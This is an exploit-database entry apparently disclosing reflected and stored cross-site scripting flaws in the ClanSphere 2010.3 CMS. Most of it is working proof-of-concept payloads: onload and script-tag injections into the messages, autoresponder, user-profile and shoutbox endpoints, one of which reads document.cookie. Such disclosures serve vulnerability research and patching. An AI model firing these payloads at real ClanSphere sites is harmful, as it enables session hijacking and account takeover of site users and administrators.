ClanSphere 2010.3 Xss Vulnerability

ID 1337DAY-ID-15469
Type zdt
Reporter lemlajt
Modified 2011-02-24T00:00:00


Exploit for php platform in category web applications

                                            # author: lemlajt
# software : Clansphere @
# version: 2010_3
# tested on: linux
# cve :

xss-01 PoC :

POST http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=create

$messages_subject=<body onload=alert('yo')>

xss-02 Stored PoC:

a. post http://localhost/www/cmsadmins/clansphere_2010_3/clansphere_2010_3/index.php?mod=messages&action=autoresponder
$autoresponder_subject=">">body onload=alert(document.cookie)>

b. 'Preview'.
c. enjoy

Better: This is stored xss:

We see this message in our mailbox, and there is
"><script>bla... in let's say: 'clear text'.

So we decide to delete this 3v1l msg from our mail's! 
--> [remove]
and this is it, stored xss is here;]

output src:
<td class="leftb">Really delete message <strong>"><body onload=alert('yo')></strong> ?</td>

btw: stored xss is also when you add "><script>tag</script> to few inputs in user profile.
then save it, and go to edit again. and here you have another xss.

* bonus:
index.php?mod=shoutbox&action=create   ( put "><script>)

# [2018-03-01]  #